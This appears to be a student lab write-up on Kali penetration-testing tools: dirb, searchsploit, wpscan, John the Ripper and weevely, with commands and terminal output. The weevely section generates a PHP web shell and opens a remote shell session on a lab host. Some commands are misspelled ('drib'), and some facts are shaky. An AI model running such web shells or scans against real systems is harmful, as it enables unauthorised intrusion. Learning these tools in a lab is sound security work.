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Task:3

1.Drib

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the responses. DIRB comes with a set of preconfigured attack wordlists for easy usage but you can use your custom wordlists.

Command:

\$ drib https://mitkundapura.com

\$ drib

\$ drib-gendict -h

2.Searchsploit

SearchSploit – The Manual. Included in our Exploit Database repository on GitLab is searchsploit, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go

Command:

\$ searchsploit

```
searchsploit
Usage: searchsploit [options] term1 [term2] ... [termN]

Examples

searchsploit afd windows local
searchsploit -t oracle windows
searchsploit -p 39446
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit -s Apache Struts 2.0.0
searchsploit linux reverse password
searchsploit -j 55555 | json_pp
For more examples, see the manual: https://www.exploit-db.com/searchsploit
```

```
* You can use any number of search terms

* By default, search terms are not case-sensitive, ordering is irrelevant, and will search between version ranges

* Use '-c' if you wish to reduce results by case-sensitive searching

* And/Or '-e' if you wish to filter results by using an exact match

* And/Or '-s' if you wish to look for an exact version match

* Use '-t' to exclude the file's path to filter the search results

* Remove false positives (especially when searching using numbers - i.e. versions)

* When using '-nmap', adding '-v' (verbose), it will search for even more combinations

* When updating or displaying help, search terms will be ignored

(kali@ kali)-[~]

$ echo "prasheela"

prasheela
```

\$ searchsploit -u

```
<mark>(kali⊛kali</mark>)-[~]
$ searchsploit -u
[i] Updating via apt package management (Expect weekly-ish updates): exploitdb
[sudo] password for kali:
Get:1 http://kali.download/kali kali-rolling InRelease [41.2 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 Packages [19.5 MB]
Get:3 http://kali.download/kali kali-rolling/main amd64 Contents (deb) [45.4 MB]
Get:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [115 kB]
Get:5 http://kali.download/kali kali-rolling/non-free amd64 Packages [223 kB]
Fetched 65.3 MB in 16s (4157 kB/s)
Reading package lists ... Done
Building dependency tree ... Done
Reading state information ... Done
1777 packages can be upgraded. Run 'apt list --upgradable' to see them.
Reading package lists... Done
Building dependency tree ... Done
Reading state information... Done
The following packages will be upgraded:
 exploitdb
```

3.Wpscan

WPScan is a security scanner designed for testing the security of websites built using WordPress. WPScan was developed using the Ruby programming language and then released in the first version in 2019. The WPScan security scanner is primarily intended to be used by WordPress administrators and security teams to assess the security status of their WordPress installations. It is used to scan WordPress websites for known vulnerabilities both in WordPress and commonly used WordPress plugins and themes. The code base for WPScan is licensed under GPLv3.

Command:

\$ wpscan -url http://example.com

4.johntheripper

John the Ripper is a popular open source password cracking tool that combines several different cracking programs and runs in both brute force and dictionary attack modes.

John the Ripper is often used in the enterprise to detect weak passwords that could put network security at risk, as well as other administrative purposes. The software can run a wide variety of password-cracking techniques against the various user accounts on each operating system and can be scripted to run locally or remotely.

5. Weevely

Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime. Upload weevely PHP agent to a target web server to get remote shell access to it

Command:

\$ weevely generate 12345 phmd.txt

\$ weevely http://192.168.29.132/phmd.txt 12345

```
(root@kali)=[~]
    weevely generate 12345 phmd.txt
Generated 'phmd.txt' with password '12345' of 700 byte size.

(root@kali)=[~]
    weevely http://192.168.29.132/phmd.txt 12345

[+] weevely 4.0.1

[+] Target: 192.168.29.132
[+] Session: /root/.weevely/sessions/192.168.29.132/phmd_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely>
zsh: suspended weevely http://192.168.29.132/phmd.txt 12345

(root@kali)=[~]
    # echo "prasheela"
prasheela
```